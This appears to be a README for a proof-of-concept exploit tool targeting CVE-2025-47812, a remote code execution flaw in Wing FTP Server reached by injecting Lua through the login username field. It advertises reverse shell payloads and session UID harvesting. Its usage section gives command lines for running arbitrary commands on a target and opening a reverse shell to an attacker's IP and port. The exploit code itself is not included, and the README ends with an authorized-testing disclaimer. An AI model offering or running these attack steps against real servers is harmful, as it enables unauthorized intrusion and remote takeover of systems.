## https://sploitus.com/exploit?id=80188E75-6D7C-5948-9425-B2436CA35A22
# CVE-2025-47812 - Wing FTP Server RCE Exploit

This repository provides a proof-of-concept exploit for **CVE-2025-47812**, a remote command execution (RCE) vulnerability in **Wing FTP Server**. By abusing the `username` parameter during authentication, an attacker can inject Lua code that runs arbitrary system commands, resulting in full remote code execution.

---

## Exploit Features

- Remote execution of custom shell commands
- Multiple built-in reverse shell payloads (bash, Python, netcat, etc.)
- Automatic UID extraction from Set-Cookie
- Logs successful UIDs to `found_uids.txt`
- Dry-run mode (no actual requests sent; test your input/output logic safely)
- Retry logic on network failure
- Cleaner payload formatting and readable output
- Input validation for IPs, ports, and URLs
- Command-line argument support for automated workflows

---

## Usage

**Execute a simple shell command:**
```bash
python3 CVE-2025-47812.py --url http://target:5466 --cmd "id"
```

**Trigger a reverse shell:**
```bash
python3 CVE-2025-47812.py --url http://target:5466 --reverse --ip YOUR_IP --port 4444
```

**Dry-run mode (no requests will be sent):**
```bash
python3 CVE-2025-47812.py --url http://target:5466 --cmd "whoami" --dry-run
```

## Changes Made to the Original Exploit

| Feature/Improvement     | Description                                                                  |
|-------------------------|------------------------------------------------------------------------------|
| **Argument Parsing**    | Added `argparse` CLI support for non-interactive mode                        |
| **Input Validation**    | Ensures valid URL/IP/port before attempting exploit                          |
| **Header Refactoring**  | Extracted HTTP headers into a reusable function for consistency              |
| **UID Logging**         | Saves successful UID tokens to `found_uids.txt`                              |
| **Dry-Run Mode**        | Allows safe testing without sending requests (`--dry-run`)                   |
| **Timeout + Retries**   | Adds request timeout and automatic retry attempts on failure                 |
| **Payload Readability** | Reformatted the Lua injection string for clarity and maintenance             |
| **Structured Output**   | Wrapped server responses and payload info with delimiters for easy reading   |
| **Status Code Checks**  | Warns user if the target returns unexpected HTTP status codes                |
| **Logging System**      | Replaces `print()` with Python `logging` module for better verbosity control |

---

## Disclaimer

This project is intended for **educational and authorized security testing only**.  
Do **not** use this tool against systems you do not own or have explicit permission to test.

---